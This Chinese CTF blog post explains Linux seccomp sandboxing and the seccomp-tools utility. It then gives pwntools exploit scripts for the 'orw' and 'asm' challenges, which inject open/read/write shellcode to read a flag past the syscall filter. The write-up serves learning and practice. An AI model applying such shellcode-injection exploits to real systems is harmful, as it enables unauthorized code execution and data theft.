pwn 之沙箱機制

tolele發表於2022-04-25

0x00: 簡介

沙箱機制，英文sandbox，是計算機領域的虛擬技術，常見於安全方向。一般說來，我們會將不受信任的軟體放在沙箱中執行，一旦該軟體有惡意行為，則禁止該程式的進一步執行，不會對真實系統造成任何危害。

安全計算模式seccomp（Secure Computing Mode）在Linux2.6.10之後引入到kernel的特性，可用其實現一個沙箱環境。使用seccomp模式可以定義系統呼叫白名單和黑名單。seccomp機制用於限制應用程式可以使用的系統呼叫，增加系統的安全性。

在ctf中主要通過兩種方式實現沙箱機制：

prctl系統呼叫；
seccomp庫函式；

0x01: 函式限制檢測工具seccomp-tools

安裝：

sudo apt install gcc ruby-dev

sudo gem install seccomp-tools

使用：

0x02: 例題實踐

Pwnable_orw:

通過checksec可以看出其架構，遠端的也是這個。

如果使用shellcraft、asm模組，要配置相對應的架構，可以通過context.binary = "./xxx"自動地完成配置。

用seccomp-tools dump ./orw檢查受限函式：

允許的函式主要有open、read、write系統呼叫函式，用這個函式讀取flag。

用32位的IDA開啟進行分析：

沒有資料段不可執行保護，所以直接往bss裡面寫shellcode就可以了。通過shellcode寫入後，後面第6行就進行執行了。

Exp:
from pwn import *
context.log_level = "debug"
context.binary = "./orw"

io = process("./orw")
#io = remote("node4.buuoj.cn",27178)
bss = 0x804A060

payload = shellcraft.open("flag")
payload += shellcraft.read(3,bss + 100, 100)
payload += shellcraft.write(1,bss + 100, 100)

io.recvuntil("Give my your shellcode:")
io.sendline(asm(payload))
print(io.recv())

Pwnable_asm:

先用checksec工具檢查架構和其保護機制，然後使用seccomp-tools工具檢查受限制函式（這步是在開啟IDA後，看到sandbox函式後進行的）。

從圖可以看出，僅被允許的系統呼叫有：read()、write()、open()和exit()。（這個在IDA的註釋裡面也有說明~）

用64位IDA開啟分析程式：

函式分析：

12行用mmap對映了一段0x1000B大小的匿名空間，起始地址為s = 0x41414000；
13行將開闢的空間用144進行初始化，144是啥？0x90。根據註釋說是用shellcode解法，應該是製作了nop滑梯。
15行將stub陣列賦給了匿名空間前段，stud是啥？由於ida中該陣列的值顯示有點零散，所以我就在pwnable網站檢視了原始碼：stud[46] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48",反彙編：（其實就是清空暫存器，好像不影響寫入shellcode）
17行接著向後面輸入資料，關鍵點：寫入我們想要shellcode進行執行。
19行chroot(directory):將該程式的根目錄改為directory。可以防止我們找不到遠端中的路徑，我們直接open("./flag")就行。
20行sandbox開沙箱機制嘛~
21行應該是ida分析有誤，原始碼是沒有引數的：((void (*)(void))s)();就是從s那裡開始執行。

分析完程式，已經很明顯了，和上一題一樣。通過17行寫入shellcode，然後21行會進行執行。

Exp:

from pwn import *
context.log_level = 'debug'
context.binary = './asm'

#io = process("./asm")
io = remote("node4.buuoj.cn",26533)

addr = 0x41414000 + 0x100
payload = shellcraft.open("flag")
payload += shellcraft.read(3, addr, 0x30)
payload += shellcraft.write(1,addr, 0x30)

io.recvuntil("give me your x64 shellcode: ")
io.sendline(asm(payload))
print(io.recv())

0x03: 最後

初步接觸，有些地方沒思考得太透。所以，有疑惑的朋友可以在評論區提出，互相交流學習。

tolele

2022-04-25

JVM--java沙箱安全機制
2020-10-11
JVMJava
[pwn基礎]Linux安全機制
2022-06-20
Linux
qiankun 的 JS 沙箱隔離機制
2024-12-04
JS
qiankun 的 CSS 沙箱隔離機制
2024-12-03
CSS
JVM探究（一）談談雙親委派機制和沙箱安全機制
2022-01-14
JVM
智慧合約的沙箱機制是什麼？
2018-11-23
淺談雲端計算與安全沙箱機制！
2022-10-18
技術淺析：前端沙箱資料安全保護的機制
2024-01-31
前端
starrycan的pwn隨筆——ELF檔案和延遲繫結機制
2024-11-16
鴻蒙Next安全基石：應用沙箱與許可權機制深度剖析
2024-11-05
鴻蒙
冷門的 Java 應用程式安全沙箱機制瞭解一下
2019-03-02
Java
[二進位制漏洞]PWN學習之格式化字串漏洞 Linux篇
2022-06-24
字串Linux
Binder機制之AIDL
2019-04-10
AI
Android Handler機制之Message及Message回收機制
2018-09-22
Android
保衛 Java 應用程式的安全沙箱機制你需要了解一下
2018-12-10
Java
HDFS 重要機制之 checkpoint
2024-10-22
MapReduce之MapTask工作機制
2020-07-19
APT
Android 之訊息機制
2018-06-07
Android
Android Handler機制之ThreadLocal
2018-09-22
Androidthread
MySQL筆記之Checkpoint機制
2023-04-08
MySql筆記
Android全面解析之Window機制
2020-12-13
Android
Android全面解析之Context機制
2020-12-11
AndroidContext
Redis學習之管道機制
2018-11-05
Redis
webpack外掛機制之Tapable
2019-02-08
Web
pwn雜項之linux命令執行
2024-05-26
Linux
Redis之時間輪機制（五）
2022-06-19
Redis
Node.js之模組機制
2019-09-21
Node.js
引數傳遞機制之JWT
2019-07-02
JWT
Java併發之等待/通知機制
2019-05-11
Java
Android之window機制token驗證
2020-12-13
Android
Dubbo原始碼解析之SPI機制
2019-04-02
原始碼
深入剖析WebRTC事件機制之Sigslot
2019-02-26
Web事件
Java基礎之反射機制（續）
2019-01-17
Java反射
Android Handler機制之總目錄
2018-09-22
Android
Android Handler機制之Handler 、MessageQueue 、Looper
2018-09-22
AndroidOOP
Java安全基礎之Java反射機制和ClassLoader類載入機制
2024-05-02
Java反射
安卓之同步機制優劣分析
2023-12-17
安卓
6、Git之團隊協作機制
2024-06-14
Git

pwn 之 沙箱機制